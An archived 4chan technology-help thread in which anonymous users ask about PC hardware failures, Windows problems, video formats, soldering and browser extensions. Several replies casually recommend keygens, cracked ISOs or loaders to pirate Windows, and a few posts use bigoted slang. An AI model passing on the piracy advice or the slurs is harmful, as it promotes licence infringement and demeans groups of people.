38 KB, 640x161
Build for Vive. Thoughts?
>>
>>54666431
wait for the new cards to come out
>>
File: jpeg.png (776 KB, 1356x832) Image search: [Google]
jpeg.png
776 KB, 1356x832
Kindle Basic: $95
Kobo Touch : $110
Which one?
Yes these are the best prices I could find here
>>
File: Want.png (597 KB, 1024x605) Image search: [Google]
Want.png
597 KB, 1024x605
Does anyone know what this workstation is called? I really want the case.
>>
>>54666910
>Workstation
That's a mainframe. Big enough it could kill you if someone tipped it on you.
>>
>>54666923
It's hard to judge the scale from the picture. Sounds perfect.
>>
File: System_z_Frames.jpg (681 KB, 2592x1728) Image search: [Google]
System_z_Frames.jpg
681 KB, 2592x1728
>>54666938
IBM System z Frames
Basically just a big rackmount enclosure
>>
>>54667065
Oh wow. If I ever convert my servers to racks i'll try and track one down. Thanks anon.
>>
>>54667065
>>54667107
Actually the one you had highlighted is the Power 770/780
>>
Is there a firefox extension that allows me to keep notes I've read on the internet? Say some anon posted instructions, or some insightful info, and I'd rather not have a text file or screenshots, is there some extension that can be helpful?
>>
File: 1398.jpg (21 KB, 347x447) Image search: [Google]
1398.jpg
21 KB, 347x447
>>54667192
>>
Reposting since couldnt get any answer in previous threads.

I have a problem of .exe files not starting under Windows 8.1 N (with media pack update installed). Whenever I double click or open cmd and type "start name.exe" nothing happenes, just mouse icon shows that something is processing but nothing is visible under task manager.

At the same time, the very same applications run at Windows 7 and Windows 10, all three being 64 bit ones.

The programs in question are all made in Pascal, two compiled with Lazarus (Free Pascal) and other unknown (probably Turbo Pascal), if that changes something.

How can I check, what prevents them from running?

Thank you for any help or advice, like always.
>>
My r9 380's drivers crash only when i play witcher 3. Literally only witcher gives me this problem even with the nvidia proprietary stuff turned off. Anyone have an idea why this would happen. I do have an oc of 1100mhz core if that matters.
>>
File: 160217-180734[1].jpg (46 KB, 602x401) Image search: [Google]
160217-180734[1].jpg
46 KB, 602x401
Is getting the samsung t3 500gb drive a stupid purchase considering it is 170 buckaroos? I just think it's so slick looking and the portability was impressive, and of course the speeds of it are just as attractive.
>>
File: 1462845643364.jpg (100 KB, 500x500) Image search: [Google]
1462845643364.jpg
100 KB, 500x500
sup /g/ , this is a stupid question from me.
Can anyone tell me about video file formats:

>Difference between Encoding and Converting
>Ive heard about "containers" like MKV whats the difference from a normal video format like mp4?

Or any lesson about video formats in general, since jewgle isnt enough help for me.
>>
Why wont my PC pair up with my Bluetooth headset?
It can't even find it.
It however, has no problems finding my phone, and my phone has no problems pairing up with the headset.
Cheers.
>>
So what is the best torrent client these days?
>>
Is it worth to learn how to code for phones I'm interested but I'm not sure where to start. I think I'm going to go for iOS though because more people in the U.S. use it. Should I learn a computer language first or just go for swift.
>>
File: 1429707389363.png (53 KB, 989x594) Image search: [Google]
1429707389363.png
53 KB, 989x594
>try to install windows 8 on a partition
>"we couldn't create a new partition or locate an existing one"
None of the solutions that I've googled have worked.
>>
>>54660036
Those are the fucking worst, anon. My old high school had a bunch of Pentium 4 shitboxes crammed into those and they were always warm to the touch.
>>
File: tough_desicions.png (201 KB, 839x645) Image search: [Google]
tough_desicions.png
201 KB, 839x645
>>54666470
guys pls help
>>
How botnet is an old nokia 3301 or the old flip phones?

>>54658516
You see the userbase changed, sadly and /prog/ and /tech/ died. We just need a consumer tech board, now more than ever. That would have all the generals and then programming, scientific programming, security, etc could flourish again
>>
>>54668696
I dont getthis image
>>
i have windows 10 family, how can i upgrade to windows 10 pro ?
>>
>>54669363
I did not know 10 had versions. Pay for an upgrade key, get a keygen or get a cracked iso
>>
>>54669396
If i get a key how do i redeem it ?
>>
How do i learn to make a compiler and how do i learn to compile a compiler without a compiler or bootstrapping
>>
>>54669417
Dude, google, lmao.

System settings "change product key"
>>
>scan with malwarebytes
>0 threats found
help
>>
>>54669432
thx
>>
File: dindunuffin.jpg (89 KB, 950x650) Image search: [Google]
dindunuffin.jpg
89 KB, 950x650
why is ff not clearing the cookeys on close?
>>
>>54669460
Get an lso coockie removet, thats all that matters
>>
>>54664590
PCPartPicker will tell you if they're compatible or not. Also check the socket type of the motherboard.
>>
For some reason 4chan is flashing and blinking for some reason and I don't know why. Everything else works but 4chan.
>>
Is anyone having problems with ccd0's 4chan X where 4chan is flashing in and out content?

>>54669627
Are you using 4chan X?
>>
File: 1405127350876.jpg (64 KB, 780x589) Image search: [Google]
1405127350876.jpg
64 KB, 780x589
How resource intensive is editing 4K and 6K footage?

We have a video editor complaining that his 2010 Mac Pro simply isn't capable of editing 4K footage, which results in his computer getting a lot of kernel panics and crashes whenever he tries, and while he makes a lot of valid points, I seem to be split either way.

On one hand, with 4K and 6K footage, you're pushing a lot of data, but besides any sort of hardware acceleration in Adobe Premiere, there shouldn't be anything special with the footage.

And in regards to video editing, what advantage would a workstation card like a Quadro or FirePro have over literally the GTX 680 they shoved in there that's probably causing the kernel panics?
>>
File: HOW5220b.png (34 KB, 394x305) Image search: [Google]
HOW5220b.png
34 KB, 394x305
I'm so lost as what to do. I replaced my splitter trying to fix this issue. Can anyone look at these logs and give me an idea for why I'm losing packets and I'm only getting 1Mbps when I'm supposed to get 120Mbps?

http://pastebin.com/fhXiBPJS

tl;dr
>moved into new room
>use old splitter from other room and put it in new room
>in this room the splitter gives signal for the tv box but not for the modem
>plug from the wall straight to the modem
>it works
>one week later I'm getting packet loss and shit speeds
>take apart splitter outside of my house and put it back together
>internet is fine again
>go to home depot and buy a 5mhz-2.1ghz splitter
>turn off modem and hookup the splitter
>tv and internet are working together again
>1 hour later my tv is fine but I'm losing packets and my internet is back to 1Mbps

I'm so lost as what to do
>>
>>54669687
Yup, damn updates.
>>
>>54669418
Interesting question, anon.
>Google
>Machine code
Good luck wit dat shiz
>>
>>54669687
It's actually the mods fucking around. Check /b/.
>>
>>54669747
Tell that dumbass hipster to get a Windows PC
>>
My 4chanx extension for chrome seems to be fucked. The website keeps on flashing between normal looking and nothing being there. I can still click everything and all, but this is really annoying. Anyone else experiencing this?
>>
How do i network unloxk my phone? Surely a free method exsists?
>>
>>54669875
nvm got it
>>
File: IMG_20160521_130220[1].jpg (398 KB, 1600x900) Image search: [Google]
IMG_20160521_130220[1].jpg
398 KB, 1600x900
wat do /g/

Athlon 750k @ 4.4ghz
7870xt stock
1st PSU Thermaltake 500w TR2
2nd Logisys grabage @ 500w

a week ago after about a 6hr gamin session my PC died, the PSU was rediculously hot. It burnt out some how, I figured the fan might of died and it over heated...

So I put in a PSU I know worked fine, booted up, back into the same game, 4 hrs later the Pc dies again, again the psu is somewhat hot but not as bad as the first time.

After letting them cool down neither one will power up anymore.

I figured there may be a short somewhere so I completely disassembled it, didnt see anything obvious, dusted everything.

Now this just came in the mail. and I'm hesitant to install it. I was plugging it into a power strip about half plugs used.

Will Evga honor an RMA if the same thing happens again?
>>
File: streamsignal.jpg (101 KB, 698x746) Image search: [Google]
streamsignal.jpg
101 KB, 698x746
>>54669753
here' a picture of signal levels
>>
4chanX is causing my opened 4chan threads to ... I don't know, it's like they're blinking like ye olde blink tags.

I fumbled my wireless keyboard just beforehand, and I think it might have triggered some kind of auto-soft-refresh?

Help! Chrome, latest version, yes it's definitely 4chanX that's to blame. Disabling the extension and going vanilla 4chan means no more eye rape.
>>
>>54658518
Use photorec on it. I don't know if there's a non-winders version so you might have to stick the SSD in another winders pc
>>
>>54670033
>using an HEC OEM PSU
Not all EVGA PSUs are good
>>
>>54670148
Further: removing 4chanX, re-adding, and even wiping all settings causes open 4chan threads to blink.
>>
I have a .img file that I want to make into a partition, how can I go about doing that?
>>
>>54670148
Read thread
>>54670258
>>
File: prob.jpg (5 KB, 250x250) Image search: [Google]
prob.jpg
5 KB, 250x250
My samsung notebook after turning on shows only bios
I see, sata port 1 not installed, I can hear hdd head parking.

So I assume that hdd is kill, but what troubles me is that I can smell smell of melted plastic when notebook is on.

Is notebook kill?

fuck fuck fuck
>>
>>54670282
kek. I blame the strobe-o-vision
>>
I'm running a VM with Windows 8 on it so I can play SS13, is there any way to have it not run like shit?
>>
>>54670364
There is no way to have SS13 not run like shit.
>>
Can someone ELI5 how to pirate windows 8 nowadays? Coming from Windows 7 where all you had to do was run DAZ loader, is there a similar program for Windows 8?
>>
>>54664614
Why is telegram a meme?
>>
I want to get into soldering, I already chose a soldering station and tips. What else do I need, by that I mean like flux or solder, and what kind do I need? What do I need to look out for?
>>
>>54663268
It's pretty much the same case. H440 just works and you can fit pretty much any AIO setup and two gpus without problems.
>>
File: IMG_20160521_135408.jpg (3 MB, 4160x2340) Image search: [Google]
IMG_20160521_135408.jpg
3 MB, 4160x2340
>>54670033
Well I installed the psu it powers on but doesn't post, the keyboard doesn't even light up I think when the psu went it took t the motherboard
>>
Anyone know anything about pairing a microsoft band to a lumia? They won't connect, and I've tried everything I could find, primarily updating both and restarting both.
>>
>installed dotnet40 in wine
>now I learn I need dotnet45 for a seperate program
>can't install, because "dotnet45 conflicts with dotnet40, which is already installed"

I uninstalled dotnet40 with wine uninstaller, but the problem persists.
I also tried grabbing dotnet45 directly from Microsoft, but the installer tells me my OS is not supported. No shit.

So how do I go about this? New prefix without the fuckups?
>>
>>54670613
I've always just used 60/40 rosin-core solder. Always get rosin core, it's so much easier to work with. As far as thickness, I can't be specific because I don't have my stuff in front of me. I generally prefer thinner, though. Even more finer, if surface mount. I GREATLY prefer solder with lead. It melts a lot nicer, and I just enjoy how shine-y it looks. I find lead-free harder to work with. Get some soldering braid so you can fix mistakes. Soldering flux pen is super helpful if what you are soldering is really dirty, also good for reworking. I'd get the no clean kind, or water soluble.

These are all my opinions, though, you may end up liking other stuff as you do more.
>>
>>54670908
Thanks, man!
>>
File: how.png (102 KB, 908x725) Image search: [Google]
how.png
102 KB, 908x725
I don't know how to install things on Linux. I keep reading random articles from google "How To Install Software on Linux" and still can't figure out how to install this older version of qbittorent.
If someone could give me an ordered list of what to do, and spoonfeed me, I'd be very grateful.
>>
The proprietary drivers for nvidia causes my computer not to shut down all the way and I have to hold down the power button.
Is there anyway to fix this?
>>
What's the best book for a beginner to learn C? Recommends are all over the place and I don't want 15 textbooks on my desk
>>
>>54671127
The 'In Easy Steps' series was honestly the best for me when I was an absolute beginner.

So I recommend C in Easy Steps, assuming you've never programmed before.
>>
My pc randomly shut down when I was playing dark souls. Now my monitor says it doesn't give a signal. Tried a different cable and also tried reinsterting my ram and gpu (MSI GTX 760). I can hear the fans spinning and I can hear the boot up sound. Did my gpu break?
>>
>>54670743
I think you should stop buying shitty PSUs, save money elsewhere if you need to instead of buying budget brand PSUs
>>
>>54669875
>>54669972
Have the same issue. How did you fix it?
>>
>>54671219
Maybe. Does the motherboard have a video connector so you can use integrated graphics? Or did you get an ATX board and/or Xeon without that?
>>
Can somebody suggest a replacement wifi card for my x200 that works with the Debian kernel out of the box without having to copy over iwlwifi files during install?
>>
>>54671352
Dont have integrated graphics.
>>
>>54671392
Try a known good GPU?
>>
>>54671569
I dont have any other gpus. Thats the problem.
>>
>>54664690
Came here to read about Borg. Your post is the only one that didn't bring crippling disappointment.
>>
>>54671194
I've done a bit of Python before, just some animations and shapes, but I'll look into that book
>>
>>54671602
Borrow one from a friend :^)
>>
>>54667471

I know it is not welcomed to bump your own question, but please respond, I really have no idea why this refuse to work and it only cause problems with my laptop being useless at work, so I have to transfer all the time between my desktop at home and desktop at work.
>>
>>54671676
All my friends are console gamers and have prebuilds. Im literally the only one that games on pc. Maybe ill try to get a cheap one from craigslist
>>
whats the best 4chan viewer for non jailbroken ios?
>>
Is there some way I can get email notifications when somoene replies to me on 4chan?
>>
>>54671265
The evga I just bought it's 80 bronze and it's decent.

I agree you shouldn't skimp on the psu, but for two to blue on 4 hrs if not just because of the brand
>>
I want use computer keyboard as MIDI controller and I'm looking for a software which would send MIDI events to Linuxsampler. I know there are programs like VMPK, but I want to use it without GUI, in terminal. I've only found midikb (https://github.com/ovenwerks/midikb). It's pretty good but it can't play two keys at once, so...
>>
4chanX is constantly flashing the page in and out. Is this an update issue, or a browser issue? It's disorienting. Anyone else having this problem? I'm running Chrome/ium.
>>
>>54671857
The EVGA you bought is manufactured by HEC, they aren't chinese housefire tier but they aren't reliable either.
>>
>>54672040
Never mind, it's not 4chan X. Time to figure out how to stop this.
Thread replies: 255
Thread images: 59

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.